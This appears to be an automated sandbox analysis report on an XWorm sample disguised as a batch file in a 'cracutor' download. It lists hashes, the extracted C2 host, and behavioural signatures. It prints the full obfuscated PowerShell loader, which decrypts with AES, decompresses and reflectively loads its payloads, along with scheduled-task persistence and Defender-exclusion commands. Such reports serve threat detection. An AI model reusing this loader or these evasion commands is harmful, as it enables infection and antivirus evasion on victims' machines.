Analysis
-
max time kernel
25s
-
max time network
49s
-
platform
windows11-21h2_x64
-
resource
win11-20240426-en
-
resource tags
arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
-
submitted
24-05-2024 13:53
Static task
static1
Behavioral task
behavioral1
Sample
cracutor1.0/cracutor (1)/ICSharpCode.AvalonEdit.dll
Resource
win11-20240508-en
Behavioral task
behavioral2
Sample
cracutor1.0/cracutor (1)/Neptune.exe
Resource
win11-20240426-en
Behavioral task
behavioral3
Sample
cracutor1.0/cracutor (1)/RuntimeBroker.bat
Resource
win11-20240426-en
Behavioral task
behavioral4
Sample
cracutor1.0/cracutor (1)/Scripts/Infinity.js
Resource
win11-20240508-en
Behavioral task
behavioral5
Sample
cracutor1.0/cracutor (1)/cracutor.bat
Resource
win11-20240508-en
General
-
Target
cracutor1.0/cracutor (1)/RuntimeBroker.bat
-
Size
1.4MB
-
MD5
5f2ca709edfb4aab62c0d293fc078a8d
-
SHA1
e0ee77775465e261c7e0f48643c6d66af21841c2
-
SHA256
5edd619490ce715b05fa88acb9865fa2c290949483b5813f70083d4480e4bf05
-
SHA512
833edd2aadcd390eeb9e264bdcbb790fa013b3141a5e092ed4f23b819903f6fce0edd68e337dd8801bc3529b80521b2aeddf06f245a6df37d1a3b2af97d41eaf
-
SSDEEP
24576:Jo2hIxM0iKuWJzW21FPYEbTT9bLZfSRAHRtaBLmc2ZlzLMLM1XwXuV:s++iu3b15f7t4l0LMLM0uV
Malware Config
Extracted
xworm
publisher-misc.gl.at.ply.gg:58207:58207
publisher-misc.gl.at.ply.gg:58207
-
Install_directory
%Temp%
-
install_file
RuntimeBroker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource: behavioral3/memory/4252-50-0x000001E273BA0000-0x000001E273BB4000-memory.dmp
yara_rule: family_xworm
-
Blocklisted process makes network request 1 IoCs
Processes:
flow 4, pid 4252, process powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
pid 4252, process powershell.exe
pid 4920, process powershell.exe
pid 900, process powershell.exe
pid 916, process powershell.exe
pid 432, process powershell.exe
pid 2552, process powershell.exe
pid 2928, process powershell.exe
-
Drops startup file 2 IoCs
Processes:
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk (process powershell.exe)
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk (process powershell.exe)
-
Executes dropped EXE 1 IoCs
Processes:
pid 4060, process Neptune.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 3 IoCs
Processes:
Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ (process Neptune.exe)
Key created: \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ (process Neptune.exe)
Key created: \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings (process powershell.exe)
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
pid 4920, process powershell.exe
pid 4920, process powershell.exe
pid 900, process powershell.exe
pid 900, process powershell.exe
pid 4252, process powershell.exe
pid 4252, process powershell.exe
pid 916, process powershell.exe
pid 916, process powershell.exe
pid 432, process powershell.exe
pid 432, process powershell.exe
pid 2552, process powershell.exe
pid 2552, process powershell.exe
pid 2928, process powershell.exe
pid 2928, process powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
PID 3408 wrote to memory of 4920 (pid 3408, process cmd.exe, target process powershell.exe)
PID 3408 wrote to memory of 4920 (pid 3408, process cmd.exe, target process powershell.exe)
PID 4920 wrote to memory of 900 (pid 4920, process powershell.exe, target process powershell.exe)
PID 4920 wrote to memory of 900 (pid 4920, process powershell.exe, target process powershell.exe)
PID 4920 wrote to memory of 956 (pid 4920, process powershell.exe, target process WScript.exe)
PID 4920 wrote to memory of 956 (pid 4920, process powershell.exe, target process WScript.exe)
PID 956 wrote to memory of 4876 (pid 956, process WScript.exe, target process cmd.exe)
PID 956 wrote to memory of 4876 (pid 956, process WScript.exe, target process cmd.exe)
PID 4876 wrote to memory of 4252 (pid 4876, process cmd.exe, target process powershell.exe)
PID 4876 wrote to memory of 4252 (pid 4876, process cmd.exe, target process powershell.exe)
PID 4252 wrote to memory of 4060 (pid 4252, process powershell.exe, target process Neptune.exe)
PID 4252 wrote to memory of 4060 (pid 4252, process powershell.exe, target process Neptune.exe)
PID 4252 wrote to memory of 4060 (pid 4252, process powershell.exe, target process Neptune.exe)
PID 4252 wrote to memory of 916 (pid 4252, process powershell.exe, target process powershell.exe)
PID 4252 wrote to memory of 916 (pid 4252, process powershell.exe, target process powershell.exe)
PID 4252 wrote to memory of 432 (pid 4252, process powershell.exe, target process powershell.exe)
PID 4252 wrote to memory of 432 (pid 4252, process powershell.exe, target process powershell.exe)
PID 4252 wrote to memory of 2552 (pid 4252, process powershell.exe, target process powershell.exe)
PID 4252 wrote to memory of 2552 (pid 4252, process powershell.exe, target process powershell.exe)
PID 4252 wrote to memory of 2928 (pid 4252, process powershell.exe, target process powershell.exe)
PID 4252 wrote to memory of 2928 (pid 4252, process powershell.exe, target process powershell.exe)
Processes
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"
1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_49_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_49.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_49.vbs"
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_49.bat" "
4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_49.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_49.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"
6⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 3KB
MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 944B
MD5 a4be454dcbec32af10161f739ec237fc
SHA1 44d5b3b34f92818563efeb37dc75442273cc2bf3
SHA256 4436e1add60e37baccc40f44b93b8ee2baf4261b5e3e45a834ba350ec9658f15
SHA512 a925de5c086cb81b50136d78dc7aea45f8205b57ae8b6219f3d00016b33ebec7e85d7630baf0c09ec2ed29a87c68f0cdefcfd21eb7e99a5679dc632cb725fc4f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 1KB
MD5 7b14efd02796c1bc5dcba81d19f112fb
SHA1 9a0e9aa3698227387a0e8fbacffa3e35c96fd25b
SHA256 1e86b2faa4cdc4dc3776bb73e33fad4df2d7f9eaae84326692491023a9efa9d0
SHA512 aad2a7a509fa424bd865677361c6d8dd23ed9c13f56d9aeb1ac96828741e9a79bdddcffa7673a74693c5b3acad89c99b6602ea5fe9b1720eb85b4e26fcaaaf56
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 944B
MD5 05b3cd21c1ec02f04caba773186ee8d0
SHA1 39e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256 911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512 e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 944B
MD5 9d17e8585400bc639a8b261083920ec3
SHA1 aef71cce477bd67115a4e2a0a86e6b8f0f62e30a
SHA256 81fa386fa9b3d185839bec826c3f8cc422e1f329792b901d61be826d42a57fc1
SHA512 235c6644c1349c77f2805c400fd1091a8775b7e63a2ba2e360418faaeb8b696da13ea7bb33a2d92b35f3fafd30fa6945c2398fba7bba39cf5f037a7d900878d5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajc4drj0.dgy.ps1
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
Filesize 2.0MB
MD5 03d0c69e31fd77718e661722361c0a5c
SHA1 04e02539771963a628477f6546be48d2d912a612
SHA256 255834540df95d84167a197acc6e70d9b80baa5dc15ddb16060508be498f1e78
SHA512 94ed7ee2ad72a4b80fc9121483c5b95ad2a1036b3a20f60499d59cc1255635bcade467952b828a3b27415ddd799c8b3a89476bc0f34726292f6632249fa0d986
-
C:\Users\Admin\AppData\Roaming\startup_str_49.bat
Filesize 1.4MB
MD5 5f2ca709edfb4aab62c0d293fc078a8d
SHA1 e0ee77775465e261c7e0f48643c6d66af21841c2
SHA256 5edd619490ce715b05fa88acb9865fa2c290949483b5813f70083d4480e4bf05
SHA512 833edd2aadcd390eeb9e264bdcbb790fa013b3141a5e092ed4f23b819903f6fce0edd68e337dd8801bc3529b80521b2aeddf06f245a6df37d1a3b2af97d41eaf
-
C:\Users\Admin\AppData\Roaming\startup_str_49.vbs
Filesize 114B
MD5 d9eec9b625bce13dc72853f75972c180
SHA1 e50f6f8df60dbd362d571d0766672aa2cfbe95b7
SHA256 06574d1a4b1637a1c4c185684f0b87fd0e4d0a14783257fd900ce65b17661e07
SHA512 b8a77b2d17ddbb1f614c4dd021993e75dc7c9026f9001ae3cd67a2bba0340281492d22ff2b52b96ca98f244027e7782255b9f8dfb7c38b0ac716df92c3380445